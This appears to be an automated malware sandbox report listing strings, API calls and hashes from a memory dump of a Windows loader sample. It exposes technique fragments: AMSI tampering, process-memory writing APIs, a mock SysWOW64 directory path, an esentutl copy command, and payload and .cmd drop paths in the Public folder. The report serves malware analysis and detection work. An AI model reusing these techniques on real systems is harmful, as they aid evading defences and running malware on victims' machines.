ScanString, xrefs: 02A1F962, 02A1FB8D, 02A1FCA2, 02A1FE33, 02A1FFC4, 02A2024D, 02A2038E, 02A20914, 02A2152C, 02A216C8, 02A21B04, 02A21D1F, 02A21D9B, 02A220B8, 02A223DE, 02A226A7, 02A22AE4, 02A22F15, 02A23125, 02A231DB, 02A234DD, 02A235FF, 02A238C0, 02A255B8, 02A25752, 02A25A97, 02A25E5B, 02A264F2, 02A26CD8, 02A26E4F, 02A26F07, 02A27574, 02A27A0E, 02A27E75, 02A28498, 02A28F3F, 02A29331, 02A2971A, 02A29AFB, 02A29DF9, 02A2A1B4, 02A2A59B, 02A2A792, 02A2AD3C
[InternetShortcut], xrefs: 02A26D48
HotKey=, xrefs: 02A26EE1
kernel32, xrefs: 02A2AAF0, 02A2AB23, 02A2AB56, 02A2AB89, 02A2ABBC, 02A2ABEF, 02A2AC22
DlpGetWebSiteAccess, xrefs: 02A2A4E6
can, xrefs: 02A23D15
SLLoadApplicationPolicies, xrefs: 02A29F08
NtOpenProcess, xrefs: 02A2928A
VirtualAlloc, xrefs: 02A2AAD9
CreateProcessAsUserA, xrefs: 02A2AA1B
CryptSIPGetInfo, xrefs: 02A1FD94
WinHttp.WinHttpRequest.5.1, xrefs: 02A2233C
BCryptVerifySignature, xrefs: 02A1FEA9, 02A2A2A6
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02A2098A
NtOpenFile, xrefs: 02A2B0E2
RetailTracerEnable, xrefs: 02A2A0AF
DllGetActivationFactory, xrefs: 02A2006D
ieproxy, xrefs: 02A1FB14, 02A1FB3B, 02A1FB6B
ntdll, xrefs: 02A2922B, 02A2927B, 02A2928F, 02A2A628, 02A2A65B, 02A2A68E, 02A2A6C1, 02A2A6F4, 02A2AE95, 02A2AEC8, 02A2AEFB, 02A2AF2E, 02A2AF61, 02A2AF94, 02A2AFC7, 02A2AFFA, 02A2B02D, 02A2B060, 02A2B093, 02A2B0C6, 02A2B0F9, 02A2B12C, 02A2B15F
NtOpenSection, xrefs: 02A2AF17
Ntdll, xrefs: 02A2A97B, 02A2A98A, 02A2A999, 02A2A9A8
dbgcore, xrefs: 02A29253, 02A29267
RtlCreateQueryDebugBuffer, xrefs: 02A2A6DD
TrustOpenStores, xrefs: 02A1FC03
WriteVirtualMemory, xrefs: 02A2ABA5
MiniDumpReadDumpStream, xrefs: 02A29262
NtAlertResumeThread, xrefs: 02A2A611
/o, xrefs: 02A264C0
C:\\Users\\Public\\Libraries\\, xrefs: 02A2616F
EtwEventWriteEx, xrefs: 02A2B115
SLGetSLIDList, xrefs: 02A29EA2
BCryptRegisterProvider, xrefs: 02A1FF0F
UacUninitialize, xrefs: 02A23844, 02A23BB2
LdrLoadDll, xrefs: 02A2B049
VirtualProtect, xrefs: 02A2AB3F
VirtualAllocEx, xrefs: 02A2AB0C
spp, xrefs: 02A2A0F9, 02A2A12C, 02A2ADC9
NtReadVirtualMemory, xrefs: 02A2AFB0
IconIndex=, xrefs: 02A26DAD
NtGetWriteWatch, xrefs: 02A2AE7E
psapi, xrefs: 02A2A9F3
FlushInstructionCache, xrefs: 02A2ABD8
NtWaitForSingleObject, xrefs: 02A2A677
psapi, xrefs: 02A2A15F
SLGetEncryptedPIDEx, xrefs: 02A2AE4B
FindCertsByIssuer, xrefs: 02A1FC69
CreateProcessWithLogonW, xrefs: 02A2AA39
http, xrefs: 02A22128
RtlAllocateHeap, xrefs: 02A2A644, 02A2A6AA
WintrustAddActionID, xrefs: 02A1FC36
EnumServicesStatusExW, xrefs: 02A2A9DF

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
API String ID: 297057983-2644593349
Opcode ID: eb0f1fba6f72aa69e916189aee71f20576d8f4858a5401141ae4beef334ed409
Instruction ID: 5a85805e86447e95154c2d926ac79f23b680c2c2a2ae64be210edb64a4807b92
Opcode Fuzzy Hash: eb0f1fba6f72aa69e916189aee71f20576d8f4858a5401141ae4beef334ed409
Instruction Fuzzy Hash: 9B14FB34A8016CDBDB10EB64EEC0ADE73BAFF89304F5045E69509AB294DE30AE55CF51

Function 02A28128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02A189D0: FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02B7B7E0,02B7B824,OpenSession,02A87380,02A2B7B8,UacScan,02A87380), ref: 02A286E9
ResumeThread.KERNEL32(00000000,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8), ref: 02A28D33
CloseHandle.KERNEL32(00000000,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,00000000,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380), ref: 02A28EB2

Part of subcall function 02A1894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,UacScan), ref: 02A18960
Part of subcall function 02A1894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A1897A
Part of subcall function 02A1894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize), ref: 02A189B6

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02A87380,02A2B7B8,UacInitialize,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,UacScan,02A87380), ref: 02A292A4

Part of subcall function 02A07E5C: GetFileAttributesA.KERNEL32(00000000,?,02A2041F,ScanString,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,UacInitialize), ref: 02A07E67

Part of subcall function 02A1DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A1DD5E), ref: 02A1DCCB
Part of subcall function 02A1DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A1DD05
Part of subcall function 02A1DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A1DD32
Part of subcall function 02A1DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A1DD3B

Part of subcall function 02A18338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02A183C2), ref: 02A183A4

ExitProcess.KERNEL32(00000000,OpenSession,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,Initialize,02A87380,02A2B7B8,00000000,00000000,00000000,ScanString,02A87380,02A2B7B8), ref: 02A2B2FA

Strings

I_QueryTagInformation, xrefs: 02A2923A
NtQuerySecurityObject, xrefs: 02A2AFE3
GetProcessMemoryInfo, xrefs: 02A2A148
MiniDumpWriteDump, xrefs: 02A2924E
NtSetSecurityObject, xrefs: 02A29276
SxTracerGetThreadContextDebug, xrefs: 02A2A0E2, 02A2ADB2
sppwmi, xrefs: 02A2ADFC
NtQueryInformationThread, xrefs: 02A2AEE4
EtwEventWrite, xrefs: 02A2B148
NtAccessCheck, xrefs: 02A2B016
sppc, xrefs: 02A29E86, 02A29EB9, 02A29EEC, 02A29F1F, 02A2AE2F, 02A2AE62
ScanString, xrefs: 02A2822C, 02A28498, 02A28F3F, 02A29331, 02A2971A, 02A29AFB, 02A29DF9, 02A2A1B4, 02A2A59B, 02A2A792, 02A2AD3C
ScanBuffer, xrefs: 02A28529, 02A287F6, 02A2899C, 02A28B29, 02A28CBD, 02A28E3C, 02A290B3, 02A291AB, 02A295C7, 02A298A0, 02A29A39, 02A29C6F, 02A29D01, 02A2A039, 02A2A3D7, 02A2A906, 02A2B20C
NtMapViewOfSection, xrefs: 02A2AF7D
kernel32, xrefs: 02A2AAF0, 02A2AB23, 02A2AB56, 02A2AB89, 02A2ABBC, 02A2ABEF, 02A2AC22
NtDeviceIoControlFile, xrefs: 02A2A985
DlpGetWebSiteAccess, xrefs: 02A2A4E6
mssip32, xrefs: 02A2A192
SLLoadApplicationPolicies, xrefs: 02A29F08
NtOpenProcess, xrefs: 02A2928A
UacScan, xrefs: 02A2841C, 02A285A5, 02A286FE, 02A288A4, 02A28A31, 02A28BC5, 02A28D44, 02A28FBB, 02A29429, 02A29643, 02A29824, 02A299BD, 02A29BF3, 02A2AA63
DllGetClassObject, xrefs: 02A2A115, 02A2ADE5
VirtualAlloc, xrefs: 02A2AAD9
SLGatherMigrationBlob, xrefs: 02A2AE18
CreateProcessAsUserA, xrefs: 02A2AA1B
BCryptVerifySignature, xrefs: 02A2A2A6
NtOpenFile, xrefs: 02A2B0E2
RtlQueryProcessDebugInformation, xrefs: 02A2A9A3
Advapi, xrefs: 02A2A9B7, 02A2A9C6, 02A2A9D5, 02A2A9E4, 02A2AA20, 02A2AA2F, 02A2AA3E
CreateProcessW, xrefs: 02A2AA0C
RetailTracerEnable, xrefs: 02A2A0AF
DlpNotifyPreDragDrop, xrefs: 02A2A44D
ntdll, xrefs: 02A2922B, 02A2927B, 02A2928F, 02A2A628, 02A2A65B, 02A2A68E, 02A2A6C1, 02A2A6F4, 02A2AE95, 02A2AEC8, 02A2AEFB, 02A2AF2E, 02A2AF61, 02A2AF94, 02A2AFC7, 02A2AFFA, 02A2B02D, 02A2B060, 02A2B093, 02A2B0C6, 02A2B0F9, 02A2B12C, 02A2B15F
EnumServicesStatusExA, xrefs: 02A2A9D0
tquery, xrefs: 02A2A0C6
NtOpenSection, xrefs: 02A2AF17
LdrGetProcedureAddress, xrefs: 02A2B07C
Ntdll, xrefs: 02A2A97B, 02A2A98A, 02A2A999, 02A2A9A8
dbgcore, xrefs: 02A29253, 02A29267
RtlCreateQueryDebugBuffer, xrefs: 02A2A6DD
WriteVirtualMemory, xrefs: 02A2ABA5
bcrypt, xrefs: 02A2A2BD
EnumServicesStatusA, xrefs: 02A2A9B2
MiniDumpReadDumpStream, xrefs: 02A29262
NtOpenObjectAuditAlarm, xrefs: 02A29226
NtAlertResumeThread, xrefs: 02A2A611
DlpCheckIsCloudSyncApp, xrefs: 02A2A480
NtQueryDirectoryFile, xrefs: 02A2A994
NtQuerySystemInformation, xrefs: 02A2A976
EtwEventWriteEx, xrefs: 02A2B115
SLGetSLIDList, xrefs: 02A29EA2
EnumServicesStatusW, xrefs: 02A2A9C1
NtWriteVirtualMemory, xrefs: 02A2B0AF
SLGetGenuineInformation, xrefs: 02A29E6F
NtQueryVirtualMemory, xrefs: 02A2AEB1
advapi32, xrefs: 02A2923F
CreateProcessA, xrefs: 02A2A9FD
Kernel32, xrefs: 02A2AA02, 02A2AA11, 02A2AA4D
MZP, xrefs: 02A29992
LdrLoadDll, xrefs: 02A2B049
CryptSIPVerifyIndirectData, xrefs: 02A2A17B
C:\Windows\System32\, xrefs: 02A286B3
VirtualProtect, xrefs: 02A2AB3F
VirtualAllocEx, xrefs: 02A2AB0C
SLIsGenuineLocalEx, xrefs: 02A29ED5
spp, xrefs: 02A2A0F9, 02A2A12C, 02A2ADC9
NtReadVirtualMemory, xrefs: 02A2AFB0
NtCreateSection, xrefs: 02A2AF4A
DlpGetArchiveFileTraceInfo, xrefs: 02A2A4B3
NtGetWriteWatch, xrefs: 02A2AE7E
CreateProcessAsUserW, xrefs: 02A2AA2A, 02A2AA48
EnumProcessModules, xrefs: 02A2A9EE
endpointdlp, xrefs: 02A2A464, 02A2A497, 02A2A4CA, 02A2A4FD
psapi, xrefs: 02A2A9F3
FlushInstructionCache, xrefs: 02A2ABD8
Initialize, xrefs: 02A281B0, 02A283A0, 02A293AD, 02A29FBD, 02A2A35B, 02A2A88A, 02A2AC44, 02A2B190
NtWaitForSingleObject, xrefs: 02A2A677
psapi, xrefs: 02A2A15F
SLGetEncryptedPIDEx, xrefs: 02A2AE4B
OpenProcess, xrefs: 02A2AB72
UacInitialize, xrefs: 02A2912F, 02A2954B
OpenSession, xrefs: 02A28134, 02A282A8, 02A28324, 02A28621, 02A2877A, 02A28920, 02A28AAD, 02A28C41, 02A28DC0, 02A28EC3, 02A29037, 02A292B5, 02A294A5, 02A29796, 02A2991C, 02A29B77, 02A29D7D, 02A29F41, 02A2A230, 02A2A2DF, 02A2A51F, 02A2A716, 02A2A80E, 02A2ACC0, 02A2B288
CreateProcessWithLogonW, xrefs: 02A2AA39
SetUnhandledExceptionFilter, xrefs: 02A2AC0B
RtlAllocateHeap, xrefs: 02A2A644, 02A2A6AA
EnumServicesStatusExW, xrefs: 02A2A9DF

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 2769005614-3738268246
Opcode ID: 3fde42e66b9e3b56c6640c66aa0f3868b0efd1138c065e1296cf5fbffc353963
Instruction ID: 36edae71f4ae463c9f2d4779583ee4fc043ed7364d67feaf933e6182e2a3eb8b
Opcode Fuzzy Hash: 3fde42e66b9e3b56c6640c66aa0f3868b0efd1138c065e1296cf5fbffc353963
Instruction Fuzzy Hash: 2E43FC35A8416CDBDB10EB68EDC0ADE73BAFF88344F1045E6A1099B254DE30AE95CF51

Function 02A23E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02A189D0: FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA

Part of subcall function 02A1DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A1DD5E), ref: 02A1DCCB
Part of subcall function 02A1DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A1DD05
Part of subcall function 02A1DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A1DD32
Part of subcall function 02A1DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A1DD3B

Sleep.KERNEL32(000003E8,ScanBuffer,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,02A2BB30,00000000,00000000,02A2BB24,00000000,00000000), ref: 02A240CB

Part of subcall function 02A188B8: LoadLibraryW.KERNEL32(amsi), ref: 02A188C1
Part of subcall function 02A188B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02A18920

Sleep.KERNEL32(000003E8,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,000003E8,ScanBuffer,02A87380,02A2B7B8,UacScan,02A87380), ref: 02A24277

Part of subcall function 02A1894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,UacScan), ref: 02A18960
Part of subcall function 02A1894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A1897A
Part of subcall function 02A1894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize), ref: 02A189B6

Sleep.KERNEL32(00004E20,UacScan,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,UacInitialize,02A87380,02A2B7B8), ref: 02A250EE

Part of subcall function 02A1DC04: RtlI.N(?,?,00000000,02A1DC7E), ref: 02A1DC2C
Part of subcall function 02A1DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02A1DC7E), ref: 02A1DC42
Part of subcall function 02A1DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02A1DC7E), ref: 02A1DC61

Part of subcall function 02A07E5C: GetFileAttributesA.KERNEL32(00000000,?,02A2041F,ScanString,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,UacInitialize), ref: 02A07E67

Part of subcall function 02A185BC: WinExec.KERNEL32(?,?), ref: 02A18624

Strings

lld.SLITUTEN, xrefs: 02A2480C
/d , xrefs: 02A264B5
UacScan, xrefs: 02A23F7F, 02A240DC, 02A24288, 02A2440B, 02A245DC, 02A246BA, 02A2484F, 02A24D10, 02A25079, 02A253F3, 02A25B8F, 02A260FF, 02A262C4, 02A265EA, 02A266F7, 02A26955, 02A26A4D
IconIndex=, xrefs: 02A26DAD
URL=file:", xrefs: 02A26D57
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02A264AA
/o, xrefs: 02A264C0
.url, xrefs: 02A25D93
C:\Users\Public\alpha.exe, xrefs: 02A254E5
C:\\Users\\Public\\Libraries\\, xrefs: 02A2616F
C:\Users\Public\, xrefs: 02A25D88, 02A26FF3
Initialize, xrefs: 02A25876, 02A25C0B, 02A26007, 02A261CC, 02A26438, 02A2656E, 02A26773
ScanString, xrefs: 02A23F03, 02A249C8, 02A24E08, 02A24FFD, 02A255B8, 02A25752, 02A25A97, 02A25E5B, 02A264F2, 02A26CD8, 02A26E4F, 02A26F07
C:\\Windows \\SysWOW64\\per.exe, xrefs: 02A243F5
[InternetShortcut], xrefs: 02A26D48
C:\Users\Public\pha.exe, xrefs: 02A2551B
ScanBuffer, xrefs: 02A23FFB, 02A24202, 02A24380, 02A24503, 02A2457F, 02A24736, 02A24947, 02A24B3C, 02A24D8C, 02A24F7C, 02A251F7, 02A2546F, 02A256B0, 02A259EA, 02A25D03, 02A26083, 02A263BC, 02A26666, 02A2686B, 02A269D1, 02A26B45, 02A26BC1
HotKey=, xrefs: 02A26EE1
UacInitialize, xrefs: 02A24A44, 02A24E84, 02A250FF, 02A2553C, 02A258F2, 02A25DDF
OpenSession, xrefs: 02A24158, 02A24304, 02A24487, 02A248CB, 02A24AC0, 02A24C18, 02A24F00, 02A2517B, 02A252FB, 02A25634, 02A257CE, 02A2596E, 02A25B13, 02A25C87, 02A25ED7, 02A25F8B, 02A26248, 02A26340, 02A267EF, 02A26AC9, 02A26C3D, 02A26DD3, 02A26F83
C:\Users\Public\CApha.exe, xrefs: 02A25500
UacUninitialize, xrefs: 02A23E1E, 02A2463E, 02A24C94, 02A25377
C:\\Windows \\SysWOW64\\, xrefs: 02A24822

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
API String ID: 2171786310-3926298568
Opcode ID: e76600bef39930c89952ba11f5ed3a54b72b788e8b53b61f874ce380b81e5dba
Instruction ID: 6247e122370117577e413c4b6a5fedc39a8511e07192a8af4a1e73e755712cf4
Opcode Fuzzy Hash: e76600bef39930c89952ba11f5ed3a54b72b788e8b53b61f874ce380b81e5dba
Instruction Fuzzy Hash: F5430B34A8016DDBEB10EB64EE80B9E73B6FF89304F1045E69509AB294DF30AE55CF51

Function 02A1E678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02A189D0: FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA

Part of subcall function 02A18788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A18814

Part of subcall function 02A1894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,UacScan), ref: 02A18960
Part of subcall function 02A1894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A1897A
Part of subcall function 02A1894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize), ref: 02A189B6

WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02A87380,02A1EF4C,OpenSession,02A87380,02A1EF4C,UacScan,02A87380,02A1EF4C,ScanBuffer,02A87380,02A1EF4C,OpenSession,02A87380), ref: 02A1ED6E
CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02A87380,02A1EF4C,OpenSession,02A87380,02A1EF4C,UacScan,02A87380,02A1EF4C,ScanBuffer,02A87380,02A1EF4C,OpenSession), ref: 02A1ED76
CloseHandle.KERNEL32(00000894,00000000,00000000,000000FF,ScanString,02A87380,02A1EF4C,OpenSession,02A87380,02A1EF4C,UacScan,02A87380,02A1EF4C,ScanBuffer,02A87380,02A1EF4C), ref: 02A1ED7F

Strings

Initialize, xrefs: 02A1EB48, 02A1ED8B
ScanString, xrefs: 02A1E76A, 02A1E90F, 02A1EAD7, 02A1ECFF
NtSetSecurityObject, xrefs: 02A1EEC0
UacScan, xrefs: 02A1E6B8, 02A1E85D, 02A1E9F5, 02A1EC35, 02A1EE78
Amsi, xrefs: 02A1E825
ScanBuffer, xrefs: 02A1EBE6, 02A1EE29
AmsiOpenSession, xrefs: 02A1E814
)"C:\Users\Public\Libraries\lxsyrsiW.cmd" , xrefs: 02A1E7F1, 02A1E9B3
ntdll, xrefs: 02A1EEC5, 02A1EED6
NtOpenProcess, xrefs: 02A1EED1
OpenSession, xrefs: 02A1E711, 02A1E8B6, 02A1EA66, 02A1EB97, 02A1EC8E, 02A1EDDA

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

